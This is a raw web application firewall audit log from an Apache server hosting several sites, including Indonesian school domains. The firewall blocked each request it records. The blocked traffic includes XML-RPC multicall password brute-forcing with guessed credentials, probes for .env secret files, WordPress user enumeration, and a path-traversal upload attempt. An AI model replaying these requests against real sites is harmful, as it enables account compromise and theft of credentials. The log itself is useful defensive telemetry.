alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123517773642 4296 (- - -) Stopwatch2: 1749123517773642 4296; combined=3272, p1=360, p2=2721, p3=0, p4=0, p5=110, sr=80, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ab2da6f-Z-- --4bf0f567-A-- [05/Jun/2025:18:39:38 +0700] aEGB-uth7G2xELALzPZeXgAAANY 103.236.140.4 60306 103.236.140.4 8181 --4bf0f567-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 1.14.93.149 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 1.14.93.149 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_151) --4bf0f567-C-- wp.getUsersBlogs kresno richard --4bf0f567-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4bf0f567-E-- --4bf0f567-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 1.14.93.149 (45+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749123578421940 5417 (- - -) Stopwatch2: 1749123578421940 5417; combined=3843, p1=500, p2=3172, p3=0, p4=0, p5=101, sr=126, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4bf0f567-Z-- --872d3075-A-- [05/Jun/2025:18:40:12 +0700] aEGCHOth7G2xELALzPZelAAAAM0 103.236.140.4 60418 103.236.140.4 8181 --872d3075-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.69.98.51 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.69.98.51 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --872d3075-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminAdmin& --872d3075-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --872d3075-E-- --872d3075-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1749123612267714 5274 (- - -) Stopwatch2: 1749123612267714 5274; combined=4227, p1=369, p2=3599, p3=37, p4=43, p5=105, sr=77, sw=74, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --872d3075-Z-- --c234d254-A-- [05/Jun/2025:18:50:48 +0700] aEGEmH-K7ToMdu-YSIJYKwAAAAY 103.236.140.4 60684 103.236.140.4 8181 --c234d254-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 18.216.69.103 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 18.216.69.103 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c234d254-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c234d254-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749124248210302 3363 (- - -) Stopwatch2: 1749124248210302 3363; combined=1441, p1=496, p2=912, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c234d254-Z-- --80ed7a43-A-- [05/Jun/2025:18:57:01 +0700] aEGGDSrHpfaS2Cuwh8ULtQAAAE8 103.236.140.4 60790 103.236.140.4 8181 --80ed7a43-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 482 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --80ed7a43-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin22admin22 --80ed7a43-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80ed7a43-E-- --80ed7a43-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749124621404730 3790 (- - -) Stopwatch2: 1749124621404730 3790; combined=2544, p1=332, p2=2097, p3=0, p4=0, p5=68, sr=62, sw=47, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80ed7a43-Z-- --f7da5f17-A-- [05/Jun/2025:18:59:19 +0700] aEGGlyrHpfaS2Cuwh8ULtgAAAFc 103.236.140.4 60826 103.236.140.4 8181 --f7da5f17-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 41.70.100.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 41.70.100.6 X-Forwarded-Proto: https Connection: close Content-Length: 488 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --f7da5f17-C-- system.multicallmethodNamewp.getUsersBlogsparamsfixitadminantixadmin --f7da5f17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7da5f17-E-- --f7da5f17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 41.70.100.6 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749124759681741 5145 (- - -) Stopwatch2: 1749124759681741 5145; combined=3365, p1=455, p2=2787, p3=0, p4=0, p5=75, sr=66, sw=48, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7da5f17-Z-- --56f45d1a-A-- [05/Jun/2025:19:00:59 +0700] aEGG-3-K7ToMdu-YSIJYVAAAAA8 103.236.140.4 60864 103.236.140.4 8181 --56f45d1a-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --56f45d1a-C-- system.multicallmethodNamewp.getUsersBlogsparamsadmin1qaz2wsx --56f45d1a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --56f45d1a-E-- --56f45d1a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749124859321471 6346 (- - -) Stopwatch2: 1749124859321471 6346; combined=4368, p1=551, p2=3682, p3=0, p4=0, p5=81, sr=93, sw=54, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --56f45d1a-Z-- --88b8f163-A-- [05/Jun/2025:19:03:23 +0700] aEGHi3-K7ToMdu-YSIJYZgAAABU 103.236.140.4 60910 103.236.140.4 8181 --88b8f163-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.23.182.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.23.182.183 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:88.0) Gecko/20100101 Firefox/88.0 Accept-Charset: utf-8 --88b8f163-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --88b8f163-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749125003482279 708 (- - -) Stopwatch2: 1749125003482279 708; combined=286, p1=248, p2=0, p3=0, p4=0, p5=38, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --88b8f163-Z-- --7a155877-A-- [05/Jun/2025:19:04:45 +0700] aEGH3X-K7ToMdu-YSIJYcAAAAAM 103.236.140.4 60940 103.236.140.4 8181 --7a155877-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7a155877-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehantix1234$ --7a155877-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a155877-E-- --7a155877-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125085981396 5258 (- - -) Stopwatch2: 1749125085981396 5258; combined=3887, p1=444, p2=3200, p3=0, p4=0, p5=142, sr=86, sw=101, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a155877-Z-- --8e34846d-A-- [05/Jun/2025:19:07:22 +0700] aEGIeirHpfaS2Cuwh8ULxAAAAFY 103.236.140.4 60988 103.236.140.4 8181 --8e34846d-B-- POST /userentry?accountId=/../../../tomcat/webapps/Zm79I/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:129.0) Gecko/20100101 Firefox/129.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 173975456 --8e34846d-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --8e34846d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e34846d-E-- --8e34846d-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125242035292 3573 (- - -) Stopwatch2: 1749125242035292 3573; combined=2243, p1=386, p2=1828, p3=0, p4=0, p5=28, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e34846d-Z-- --ce1d1249-A-- [05/Jun/2025:19:07:27 +0700] aEGIf-th7G2xELALzPZe2gAAAMg 103.236.140.4 60992 103.236.140.4 8181 --ce1d1249-B-- GET /.env HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.65.15.81 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* Cookie: X-Forwarded-For: 159.65.15.81 Accept-Encoding: gzip X-Varnish: 172954166 --ce1d1249-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ce1d1249-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749125247280405 718 (- - -) Stopwatch2: 1749125247280405 718; combined=266, p1=233, p2=0, p3=0, p4=0, p5=33, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce1d1249-Z-- --78dc801f-A-- [05/Jun/2025:19:07:49 +0700] aEGIleth7G2xELALzPZe3QAAAMs 103.236.140.4 32778 103.236.140.4 8181 --78dc801f-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 92.205.161.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 92.205.161.6 X-Forwarded-Proto: https Connection: close Content-Length: 479 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --78dc801f-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehsoleh& --78dc801f-F-- HTTP/1.1 404 Not Found Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --78dc801f-E-- --78dc801f-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||bogl.no|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "mod_suphp.c"] [line 790] [level 3] File does not exist: %s Stopwatch: 1749125269463073 5106 (- - -) Stopwatch2: 1749125269463073 5106; combined=3892, p1=374, p2=3301, p3=22, p4=24, p5=101, sr=94, sw=70, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78dc801f-Z-- --346cfa78-A-- [05/Jun/2025:19:08:36 +0700] aEGIxOth7G2xELALzPZe3wAAANE 103.236.140.4 32786 103.236.140.4 8181 --346cfa78-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 41.70.100.6 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 41.70.100.6 X-Forwarded-Proto: https Connection: close Content-Length: 483 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --346cfa78-C-- system.multicallmethodNamewp.getUsersBlogsparamsadminpass123456 --346cfa78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --346cfa78-E-- --346cfa78-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 41.70.100.6 (1+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125316954198 5612 (- - -) Stopwatch2: 1749125316954198 5612; combined=4053, p1=487, p2=3362, p3=0, p4=0, p5=117, sr=95, sw=87, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --346cfa78-Z-- --8972d751-A-- [05/Jun/2025:19:10:37 +0700] aEGJPVwdJdhOudw5hdz_yAAAAJM 103.236.140.4 32812 103.236.140.4 8181 --8972d751-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 54.78.115.243 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 54.78.115.243 X-Forwarded-Proto: https Connection: close Content-Length: 481 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8972d751-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehSoleh971 --8972d751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8972d751-E-- --8972d751-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 54.78.115.243 (0+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125437178146 6430 (- - -) Stopwatch2: 1749125437178146 6430; combined=4566, p1=550, p2=3789, p3=0, p4=0, p5=130, sr=94, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8972d751-Z-- --7b856266-A-- [05/Jun/2025:19:14:40 +0700] aEGKMFwdJdhOudw5hdz_5wAAAIE 103.236.140.4 32906 103.236.140.4 8181 --7b856266-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 103.180.134.27 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 103.180.134.27 X-Forwarded-Proto: https Connection: close Content-Length: 484 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --7b856266-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehJarvis@2025 --7b856266-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b856266-E-- --7b856266-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 103.180.134.27 (+1 hits since last alert)|bogl.no|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749125680377303 6403 (- - -) Stopwatch2: 1749125680377303 6403; combined=4452, p1=551, p2=3688, p3=0, p4=0, p5=138, sr=87, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b856266-Z-- --8f61175d-A-- [05/Jun/2025:19:19:57 +0700] aEGLbeth7G2xELALzPZe9gAAANE 103.236.140.4 32970 103.236.140.4 8181 --8f61175d-B-- POST /xmlrpc.php HTTP/1.0 Host: bogl.no X-Real-IP: 208.109.32.135 X-Forwarded-Host: bogl.no X-Forwarded-Server: bogl.no X-Forwarded-For: 208.109.32.135 X-Forwarded-Proto: https Connection: close Content-Length: 485 Accept: */* Accept-Language: ru-RU,ru;q=0.9 Content-Type: application/xml User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --8f61175d-C-- system.multicallmethodNamewp.getUsersBlogsparamssolehAdmin@123321 --8f61175d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f61175d-E-- --8f61175d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
